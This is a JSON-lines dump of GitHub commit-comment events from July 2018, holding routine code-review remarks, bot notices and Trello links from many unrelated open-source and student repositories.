{"id":"8000871492","type":"CommitCommentEvent","actor":{"login":"ShivamKumarJha"},"repo":{"name":"X00TD/android_device_asus_X00TD"},"payload":{"comment":{"id":29794293,"position":7,"line":2800,"path":"proprietary-files.txt","commit_id":"6515354e0cece36f11195ffeb1d8701720359f58","created_at":"2018-07-22T21:07:58Z","updated_at":"2018-07-22T21:07:58Z","author_association":"MEMBER","body":"move these to vendor too\r\n\r\nin extract-files.sh add these\r\nIMSCMSERVICE=\"$LINEAGE_ROOT\"/vendor/\"$VENDOR\"/\"$DEVICE\"/proprietary/etc/permissions/com.qualcomm.qti.imscmservice.xml\r\nIMSCMSERVICE_1_1=\"$LINEAGE_ROOT\"/vendor/\"$VENDOR\"/\"$DEVICE\"/proprietary/etc/permissions/com.qualcomm.qti.imscmservice_1_1.xml\r\n\r\nsed -i \"s|/system/framework/|/vendor/framework/|g\" file \"$IMSCMSERVICE\"\r\nsed -i \"s|/system/framework/|/vendor/framework/|g\" file \"$IMSCMSERVICE_1_1\"\r\n"}},"created_at":"2018-07-22T21:07:58Z"}
{"id":"8000871846","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29794294,"position":null,"line":null,"path":null,"commit_id":"aa184e07e66ff6ff758b7270d66c65319625bcab","created_at":"2018-07-22T21:08:12Z","updated_at":"2018-07-22T21:08:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Export all notes to a CSV](https://trello.com/c/bMbYbsEj/12-export-all-notes-to-a-csv)"}},"created_at":"2018-07-22T21:08:12Z"}
{"id":"8000871856","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29794295,"position":null,"line":null,"path":null,"commit_id":"3f412f841998869f985e21c255825da16f19a1ae","created_at":"2018-07-22T21:08:12Z","updated_at":"2018-07-22T21:08:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Export all notes to a CSV](https://trello.com/c/bMbYbsEj/12-export-all-notes-to-a-csv)"}},"created_at":"2018-07-22T21:08:12Z"}
{"id":"8000871863","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29794296,"position":null,"line":null,"path":null,"commit_id":"35a99f52267760c01a3ff56f0f9b91f4437919db","created_at":"2018-07-22T21:08:13Z","updated_at":"2018-07-22T21:08:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Export all notes to a CSV](https://trello.com/c/bMbYbsEj/12-export-all-notes-to-a-csv)"}},"created_at":"2018-07-22T21:08:13Z"}
{"id":"8000872024","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29794297,"position":null,"line":null,"path":null,"commit_id":"862dda2dcdc2a46dc3781fbd8f301ea6af416882","created_at":"2018-07-22T21:08:21Z","updated_at":"2018-07-22T21:08:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Export all notes to a CSV](https://trello.com/c/bMbYbsEj/12-export-all-notes-to-a-csv)"}},"created_at":"2018-07-22T21:08:21Z"}
{"id":"8000872035","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29794298,"position":null,"line":null,"path":null,"commit_id":"8521b690971963658bddd8ddc9611116d55668a3","created_at":"2018-07-22T21:08:21Z","updated_at":"2018-07-22T21:08:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Export all notes to a CSV](https://trello.com/c/bMbYbsEj/12-export-all-notes-to-a-csv)"}},"created_at":"2018-07-22T21:08:21Z"}
{"id":"8000872120","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"nunomaduro/larastan"},"payload":{"comment":{"id":29794299,"position":null,"line":null,"path":null,"commit_id":"8231b52c6de2fe5ebba91021ecbfbfe260ed4416","created_at":"2018-07-22T21:08:25Z","updated_at":"2018-07-22T21:08:25Z","author_association":"CONTRIBUTOR","body":"@nunomaduro All green 💚 "}},"created_at":"2018-07-22T21:08:25Z"}
{"id":"8000872392","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/colorclass-feedstock"},"payload":{"comment":{"id":29794300,"position":null,"line":null,"path":null,"commit_id":"4257ab9dce7c2e72e395c1aa0a6a59e0237e5301","created_at":"2018-07-22T21:08:37Z","updated_at":"2018-07-22T21:08:37Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @carlodri was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-22T21:08:37Z"}
{"id":"8000872921","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794302,"position":23,"line":30,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:09:05Z","updated_at":"2018-07-22T21:09:05Z","author_association":"OWNER","body":"@gmltA \r\nAdditionalTasksMaxCost is used to get award points for an additional task.\r\n\r\ngameTeam.Bonuses += game.AdditionalTasksMaxCost  / numberOfTeamsWhichHaveAlreadyPassedThisTask"}},"created_at":"2018-07-22T21:09:05Z"}
{"id":"8000873595","type":"CommitCommentEvent","actor":{"login":"nunomaduro"},"repo":{"name":"nunomaduro/larastan"},"payload":{"comment":{"id":29794303,"position":null,"line":null,"path":null,"commit_id":"8231b52c6de2fe5ebba91021ecbfbfe260ed4416","created_at":"2018-07-22T21:09:36Z","updated_at":"2018-07-22T21:09:36Z","author_association":"OWNER","body":"@szepeviktor Yeah! Thanks for all your help so far!"}},"created_at":"2018-07-22T21:09:36Z"}
{"id":"8000874113","type":"CommitCommentEvent","actor":{"login":"l3wi"},"repo":{"name":"iotaledger/mam.client.js"},"payload":{"comment":{"id":29794305,"position":null,"line":null,"path":null,"commit_id":"ea50c24a9b0290f0156d131256446639438eb478","created_at":"2018-07-22T21:10:01Z","updated_at":"2018-07-22T21:10:01Z","author_association":"NONE","body":"I was sitting with @lutostag when he came across this. I wasn't able to reproduce locally but in his env; Node 4.2.6 the behaviour was as described. \r\n\r\nI erred on the side of caution and merged."}},"created_at":"2018-07-22T21:10:01Z"}
{"id":"8000874856","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794306,"position":10,"line":144,"path":"src/supertux/game_session_recorder.cpp","commit_id":"8a8b67d2646dd4ddec5f6efcc628fc75d1dbfbf7","created_at":"2018-07-22T21:10:33Z","updated_at":"2018-07-22T21:10:33Z","author_association":"CONTRIBUTOR","body":"That one is an `istream`, have fun getting that proposal into some future standard."}},"created_at":"2018-07-22T21:10:33Z"}
{"id":"8000875923","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794310,"position":25,"line":32,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:11:20Z","updated_at":"2018-07-22T21:11:20Z","author_association":"OWNER","body":"@gmltA \r\nMy purpouse is to allow admin to set a default general tasks cost for a game if he doesn't wish to set a cost per task."}},"created_at":"2018-07-22T21:11:20Z"}
{"id":"8000877151","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794312,"position":10,"line":144,"path":"src/supertux/game_session_recorder.cpp","commit_id":"8a8b67d2646dd4ddec5f6efcc628fc75d1dbfbf7","created_at":"2018-07-22T21:12:16Z","updated_at":"2018-07-22T21:12:16Z","author_association":"MEMBER","body":"Don't we have our own implementation of istream? No idea."}},"created_at":"2018-07-22T21:12:16Z"}
{"id":"8000878799","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794314,"position":21,"line":21,"path":"BsuirFind.Foundation.Dto/Games/GameTaskDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:13:24Z","updated_at":"2018-07-22T21:13:24Z","author_association":"OWNER","body":"@gmltA \r\nMy mistake, I'm removing it in a new commit"}},"created_at":"2018-07-22T21:13:24Z"}
{"id":"8000879328","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29794315,"position":null,"line":null,"path":null,"commit_id":"d1dbce64bd351aedd643752fc4ccb46f4181b2d8","created_at":"2018-07-22T21:13:47Z","updated_at":"2018-07-22T21:13:47Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T21:13:47Z"}
{"id":"8000881708","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794322,"position":5,"line":100,"path":"src/math/random_generator.cpp","commit_id":"52567b63a237c5993665edcc8accb54821940401","created_at":"2018-07-22T21:15:31Z","updated_at":"2018-07-22T21:15:31Z","author_association":"CONTRIBUTOR","body":"Which part of it? The latter? That might change reproducibility of things (replays, etc), but I can give it a try."}},"created_at":"2018-07-22T21:15:31Z"}
{"id":"8000881892","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29794323,"position":null,"line":null,"path":null,"commit_id":"393124229a4e2ba4384ba10766dc6b6ade4b33c7","created_at":"2018-07-22T21:15:40Z","updated_at":"2018-07-22T21:15:40Z","author_association":"COLLABORATOR","body":"Appname"}},"created_at":"2018-07-22T21:15:40Z"}
{"id":"8000882139","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"nunomaduro/larastan"},"payload":{"comment":{"id":29794324,"position":null,"line":null,"path":null,"commit_id":"8231b52c6de2fe5ebba91021ecbfbfe260ed4416","created_at":"2018-07-22T21:15:51Z","updated_at":"2018-07-22T21:15:51Z","author_association":"CONTRIBUTOR","body":"You're welcome."}},"created_at":"2018-07-22T21:15:51Z"}
{"id":"8000883208","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29794326,"position":null,"line":null,"path":null,"commit_id":"def17aa26cb76252f48fedcced980ef68a09a957","created_at":"2018-07-22T21:16:40Z","updated_at":"2018-07-22T21:16:40Z","author_association":"CONTRIBUTOR","body":"@MartianLee \r\n\r\n멋집니다. 수고 많으셨고요. 두 가지 의논드립니다.\r\n\r\n1. 수정 app/views/posts/_form_decision.html.haml 의 form_for 태그에 보면 js-parti-editor-selector-form 라는 클래스가 지정되어 있습니다. 이 form_for를 어디서 복사하신 듯한데요. 우리팀은 front-end에 action을 걸때 http://guides.rubyonrails.org/working_with_javascript_in_rails.html#unobtrusive-javascript 방식을 주로 쓰고 있습니다. 원래는 'data' 속성에 주로 쓰고 했습니다만 하나의 dom element에 여러 action이 걸리는 경우가 종종 있어 그 관리에 어려움을 겪어왔습니다. 해서 최근 부터는 \"js-\"로 시작하는 class명을 action 지시자로 쓰고 있습니다. js-parti-editor-selector-form도 action 지시자입니다. js-parti-editor-selector-form의 실제 효과는 application.js에서 찾아 보시면 되고요. 제가 궁금한 것은 js-parti-editor-selector-form이 필요한 곳이 아닌 곳인데 왜 쓰였나는 것입니다.\r\n\r\n2. 이전 토론정리한 것과 비교하는 기능이 있는데 보셨나요? 단순 text 비교를 하는 방식으로 구현되어 있습니다. 지금처럼 에디어로 정리하면 html로 저장됩니다. 단순  text로 비교하게되면 html tag도 비교하게 됩니다. 이런 현상이 예상되는데 혹시 테스트하거나 고려하신 사항이 있는지요? \r\n\r\n현재 빠띠에 몇 가지 버그 리포트가 와있는데요. 이를 수정하고 배포하면 이 커밋도 같이 적용됩니다. 제 생각에 2번은 이 커밋을 적용 전에 꼭 확인하고 싶습니다."}},"created_at":"2018-07-22T21:16:40Z"}
{"id":"8000883500","type":"CommitCommentEvent","actor":{"login":"tobbi"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794327,"position":5,"line":100,"path":"src/math/random_generator.cpp","commit_id":"52567b63a237c5993665edcc8accb54821940401","created_at":"2018-07-22T21:16:53Z","updated_at":"2018-07-22T21:16:53Z","author_association":"MEMBER","body":"iirc, we don't use that random generator for anything crucial."}},"created_at":"2018-07-22T21:16:53Z"}
{"id":"8000884048","type":"CommitCommentEvent","actor":{"login":"cristisavin"},"repo":{"name":"cristisavin/scoala-informala-homework"},"payload":{"comment":{"id":29794328,"position":null,"line":null,"path":null,"commit_id":"90a5a8a3496f771265ecf0cdf51f46fea2a5b727","created_at":"2018-07-22T21:17:18Z","updated_at":"2018-07-22T21:17:18Z","author_association":"OWNER","body":"OOD homework. Local_store"}},"created_at":"2018-07-22T21:17:18Z"}
{"id":"8000884265","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29794329,"position":19,"line":26,"path":"BsuirFind.Foundation.Dto/Games/EditGameDto.cs","commit_id":"d8cbcf6d08c84f60f0857def6572a3963a0226e3","created_at":"2018-07-22T21:17:28Z","updated_at":"2018-07-22T21:17:28Z","author_association":"COLLABORATOR","body":"GameTask sequence entity. There is no data to store there. We can just rely on simple ID field in GameTask object. Why this collection exists in Game?"}},"created_at":"2018-07-22T21:17:28Z"}
{"id":"8000884854","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"RiiConnect24/RiiConnect24-Patcher"},"payload":{"comment":{"id":29794330,"position":null,"line":null,"path":null,"commit_id":"fdb7a917d9c3068d53c43e9b57daf09b1e6b3e06","created_at":"2018-07-22T21:17:54Z","updated_at":"2018-07-22T21:17:54Z","author_association":"CONTRIBUTOR","body":"`[CRITICAL BUG FIX]`\r\nyeah, pretty critical."}},"created_at":"2018-07-22T21:17:54Z"}
{"id":"8000885325","type":"CommitCommentEvent","actor":{"login":"cvwang"},"repo":{"name":"MilliApp/ios"},"payload":{"comment":{"id":29794332,"position":null,"line":null,"path":null,"commit_id":"b561541cfb12ad882250a500a40a350bc22fc7c8","created_at":"2018-07-22T21:18:14Z","updated_at":"2018-07-22T21:18:14Z","author_association":"CONTRIBUTOR","body":"This works towards feature #2:\r\nhttps://gfycat.com/ArcticImaginaryAstrangiacoral"}},"created_at":"2018-07-22T21:18:14Z"}
{"id":"8000887366","type":"CommitCommentEvent","actor":{"login":"drfrag666"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29794334,"position":null,"line":null,"path":null,"commit_id":"fccb0b76c6a99954628b8c819fbddb018ee8a061","created_at":"2018-07-22T21:19:50Z","updated_at":"2018-07-22T21:19:50Z","author_association":"CONTRIBUTOR","body":" That's what i said earlier in the forum, the function is called min but calculates the maximum. That said i already pushed the fixed version without templates in legacy."}},"created_at":"2018-07-22T21:19:50Z"}
{"id":"8000888824","type":"CommitCommentEvent","actor":{"login":"KoltesDigital"},"repo":{"name":"KoltesDigital/shadertoy-exporter"},"payload":{"comment":{"id":29794337,"position":null,"line":null,"path":null,"commit_id":"9d802f9c3235c088d9c1a548c7932c66bda52907","created_at":"2018-07-22T21:20:54Z","updated_at":"2018-07-22T21:20:54Z","author_association":"OWNER","body":"Thanks! I'll remove the notice then :)"}},"created_at":"2018-07-22T21:20:54Z"}
{"id":"8000900171","type":"CommitCommentEvent","actor":{"login":"BenLubar"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29794344,"position":null,"line":null,"path":null,"commit_id":"7558046e757640e99614aa88df4998bdb362d16b","created_at":"2018-07-22T21:29:19Z","updated_at":"2018-07-22T21:29:19Z","author_association":"CONTRIBUTOR","body":"Does this actually lock the client's session or can they just send a bunch of requests simultaneously and wait for one to return a success response?"}},"created_at":"2018-07-22T21:29:19Z"}
{"id":"8000902756","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794348,"position":10,"line":144,"path":"src/supertux/game_session_recorder.cpp","commit_id":"8a8b67d2646dd4ddec5f6efcc628fc75d1dbfbf7","created_at":"2018-07-22T21:31:16Z","updated_at":"2018-07-22T21:31:16Z","author_association":"CONTRIBUTOR","body":"Unlikely if you have `std::istream` in the header."}},"created_at":"2018-07-22T21:31:16Z"}
{"id":"8000903228","type":"CommitCommentEvent","actor":{"login":"leper"},"repo":{"name":"SuperTux/supertux"},"payload":{"comment":{"id":29794349,"position":5,"line":100,"path":"src/math/random_generator.cpp","commit_id":"52567b63a237c5993665edcc8accb54821940401","created_at":"2018-07-22T21:31:40Z","updated_at":"2018-07-22T21:31:40Z","author_association":"CONTRIBUTOR","body":"Alright I guess I'll try, if not I can still blame you :P"}},"created_at":"2018-07-22T21:31:40Z"}
{"id":"8000904038","type":"CommitCommentEvent","actor":{"login":"cristisavin"},"repo":{"name":"cristisavin/scoala-informala-homework"},"payload":{"comment":{"id":29794350,"position":null,"line":null,"path":null,"commit_id":"612cf66028b7b79a90db368d98a2f7f233c1931b","created_at":"2018-07-22T21:32:17Z","updated_at":"2018-07-22T21:32:17Z","author_association":"OWNER","body":"OOD homework"}},"created_at":"2018-07-22T21:32:17Z"}
{"id":"8000909152","type":"CommitCommentEvent","actor":{"login":"rocket-pocket"},"repo":{"name":"rocket-pocket/paginas_Web_js"},"payload":{"comment":{"id":29794355,"position":null,"line":null,"path":null,"commit_id":"e148ac67191b457b7f34b0cc2005f0859852bf9b","created_at":"2018-07-22T21:36:19Z","updated_at":"2018-07-22T21:36:19Z","author_association":"OWNER","body":"1. Esto es una prueba\r\n"}},"created_at":"2018-07-22T21:36:19Z"}
{"id":"8000909675","type":"CommitCommentEvent","actor":{"login":"julianlam"},"repo":{"name":"NodeBB/NodeBB"},"payload":{"comment":{"id":29794356,"position":null,"line":null,"path":null,"commit_id":"7558046e757640e99614aa88df4998bdb362d16b","created_at":"2018-07-22T21:36:44Z","updated_at":"2018-07-22T21:36:44Z","author_association":"MEMBER","body":"Integration into some sort of lockout based on IP would be ideal 👍"}},"created_at":"2018-07-22T21:36:44Z"}
{"id":"8000910277","type":"CommitCommentEvent","actor":{"login":"irakrakow"},"repo":{"name":"irakrakow/Rainbow-Poem"},"payload":{"comment":{"id":29794358,"position":null,"line":null,"path":null,"commit_id":"9975cd75941e04235490b67789ed0c0d243db5ca","created_at":"2018-07-22T21:37:12Z","updated_at":"2018-07-22T21:37:12Z","author_association":"OWNER","body":"Comment on adding yellow."}},"created_at":"2018-07-22T21:37:12Z"}
{"id":"8000911021","type":"CommitCommentEvent","actor":{"login":"TheXWolf"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29794359,"position":null,"line":null,"path":null,"commit_id":"5d7625b43621124c1d2f9ebff991e2249113e247","created_at":"2018-07-22T21:37:46Z","updated_at":"2018-07-22T21:37:46Z","author_association":"NONE","body":"Thank you @frostfire11 and @Traesh! I wasn't aware 88263 did it's own calculation. Thanks for the catch I'll watch spellwork a little closer next time."}},"created_at":"2018-07-22T21:37:46Z"}
{"id":"8000911704","type":"CommitCommentEvent","actor":{"login":"danimoh"},"repo":{"name":"nimiq-network/core"},"payload":{"comment":{"id":29794360,"position":38,"line":154,"path":"clients/nodejs/node-ui/rpc-client.js","commit_id":"d48be6c6d9d62c83b774507f6101afc645f25fcf","created_at":"2018-07-22T21:38:16Z","updated_at":"2018-07-22T21:38:16Z","author_association":"COLLABORATOR","body":"This check doesn't work correctly anymore as `this._peerCount = peerCount;` happens before"}},"created_at":"2018-07-22T21:38:16Z"}
{"id":"8000914583","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29794365,"position":null,"line":null,"path":null,"commit_id":"ea77474a631913245b5186a4aeef86e7e3ce3ca4","created_at":"2018-07-22T21:40:26Z","updated_at":"2018-07-22T21:40:26Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-256](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-256).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-256-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-22T21:40:26Z"}
{"id":"8000918532","type":"CommitCommentEvent","actor":{"login":"3-mann"},"repo":{"name":"3-mann/hello-world"},"payload":{"comment":{"id":29794376,"position":null,"line":null,"path":null,"commit_id":"8449f0c1117cf0ecd5484eadcc7be2c436febad7","created_at":"2018-07-22T21:43:22Z","updated_at":"2018-07-22T21:43:22Z","author_association":"OWNER","body":"alles OK"}},"created_at":"2018-07-22T21:43:22Z"}
{"id":"8000918936","type":"CommitCommentEvent","actor":{"login":"unitof"},"repo":{"name":"IB5k/burningman-mec-pixelpusher"},"payload":{"comment":{"id":29794377,"position":4,"line":7,"path":"README.md","commit_id":"2545c048b7f2384592ac634d947e963291a85878","created_at":"2018-07-22T21:43:42Z","updated_at":"2018-07-22T21:43:42Z","author_association":"MEMBER","body":"@detournement iPod (audio input) or iPad (app controller)?"}},"created_at":"2018-07-22T21:43:42Z"}
{"id":"8000919315","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794379,"position":10,"line":10,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:44:00Z","updated_at":"2018-07-22T21:44:00Z","author_association":"NONE","body":"Вот иногда ещё и эту константу выносят - она часто встречается и от неё периодически что-то зависит (`@media`-query)"}},"created_at":"2018-07-22T21:44:00Z"}
{"id":"8000919470","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"LubomirR/scummvm"},"payload":{"comment":{"id":29794381,"position":60,"line":124,"path":"engines/mutationofjb/font.cpp","commit_id":"907660e58b217879a1339d8a411d8d0c2082c148","created_at":"2018-07-22T21:44:08Z","updated_at":"2018-07-22T21:44:08Z","author_association":"NONE","body":"We already have wordWrapText() in graphics/font.h"}},"created_at":"2018-07-22T21:44:08Z"}
{"id":"8000920760","type":"CommitCommentEvent","actor":{"login":"cassioconti"},"repo":{"name":"cassioconti/blockchain-playground"},"payload":{"comment":{"id":29794384,"position":null,"line":null,"path":null,"commit_id":"33b8b96f5f35e82d33c56f07945506147385a822","created_at":"2018-07-22T21:45:07Z","updated_at":"2018-07-22T21:45:07Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add a REST API layer](https://trello.com/c/mBRHIuUp/1-add-a-rest-api-layer)"}},"created_at":"2018-07-22T21:45:07Z"}
{"id":"8000920870","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794385,"position":62,"line":54,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:45:11Z","updated_at":"2018-07-22T21:45:11Z","author_association":"NONE","body":"Вот в совсем серьёзных компаниях есть конечный набор размеров шрифтов (font-size + line-height) которые можно применять на сайте. Часто их в отдельную миксину выносят."}},"created_at":"2018-07-22T21:45:11Z"}
{"id":"8000921899","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794388,"position":22,"line":90,"path":"html/main_learning_site.html","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:45:57Z","updated_at":"2018-07-22T21:45:57Z","author_association":"NONE","body":"ТОгда уж `<label>` - к инпутам полагается `<label>` в пару."}},"created_at":"2018-07-22T21:45:57Z"}
{"id":"8000921984","type":"CommitCommentEvent","actor":{"login":"cassioconti"},"repo":{"name":"cassioconti/blockchain-playground"},"payload":{"comment":{"id":29794390,"position":null,"line":null,"path":null,"commit_id":"f02ebbd4a63e348ae8a48f581a966d5b3f7ab6f4","created_at":"2018-07-22T21:46:01Z","updated_at":"2018-07-22T21:46:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add get block endpoint](https://trello.com/c/jP0nVLwi/2-add-get-block-endpoint)"}},"created_at":"2018-07-22T21:46:01Z"}
{"id":"8000922397","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794391,"position":16,"line":84,"path":"html/main_learning_site.html","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:46:21Z","updated_at":"2018-07-22T21:46:21Z","author_association":"NONE","body":"Красотища))"}},"created_at":"2018-07-22T21:46:21Z"}
{"id":"8000923199","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794393,"position":110,"line":91,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:46:57Z","updated_at":"2018-07-22T21:46:57Z","author_association":"NONE","body":"В константуууу"}},"created_at":"2018-07-22T21:46:57Z"}
{"id":"8000924407","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794395,"position":162,"line":143,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:47:51Z","updated_at":"2018-07-22T21:47:51Z","author_association":"NONE","body":"`@white` ктстати в некоторых случаях белый делаю не `#fff` совсем."}},"created_at":"2018-07-22T21:47:51Z"}
{"id":"8000925345","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794398,"position":1,"line":1,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:48:32Z","updated_at":"2018-07-22T21:48:32Z","author_association":"NONE","body":"Вот такие констнты выносятся отдельно в `brand.less` - и он, кстати, периодически кочует из проекта в проект."}},"created_at":"2018-07-22T21:48:32Z"}
{"id":"8000925730","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794399,"position":108,"line":89,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:48:49Z","updated_at":"2018-07-22T21:48:49Z","author_association":"NONE","body":"`@light-gray` не?"}},"created_at":"2018-07-22T21:48:49Z"}
{"id":"8000926054","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794400,"position":107,"line":88,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:49:05Z","updated_at":"2018-07-22T21:49:05Z","author_association":"NONE","body":"А это можно убрать -- применится следующее правило."}},"created_at":"2018-07-22T21:49:05Z"}
{"id":"8000926464","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794402,"position":90,"line":76,"path":"html/webpack/src/main.less","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:49:25Z","updated_at":"2018-07-22T21:49:25Z","author_association":"NONE","body":"Ну так себе название, если честно)))))))))"}},"created_at":"2018-07-22T21:49:25Z"}
{"id":"8000927380","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ds-vologdin/learning_courses_site"},"payload":{"comment":{"id":29794404,"position":70,"line":70,"path":"html/webpack/src/register_form.js","commit_id":"11e27952a5fd9e430adbe17e71fb5cc73a8dbe7c","created_at":"2018-07-22T21:50:04Z","updated_at":"2018-07-22T21:50:04Z","author_association":"NONE","body":"А вот это всё будет делать реакт)))))))))) И совсем скоро мы с этим познакомимся)))"}},"created_at":"2018-07-22T21:50:04Z"}
{"id":"8000927824","type":"CommitCommentEvent","actor":{"login":"lduguid"},"repo":{"name":"cmangos/tbc-db"},"payload":{"comment":{"id":29794407,"position":null,"line":null,"path":null,"commit_id":"106915097925b9527069bd659dd340cdfc9b3d76","created_at":"2018-07-22T21:50:23Z","updated_at":"2018-07-22T21:50:23Z","author_association":"NONE","body":"Just for info purposes... MySQL default is 4MB as of MySQL 5.6.6, 1MB before that."}},"created_at":"2018-07-22T21:50:23Z"}
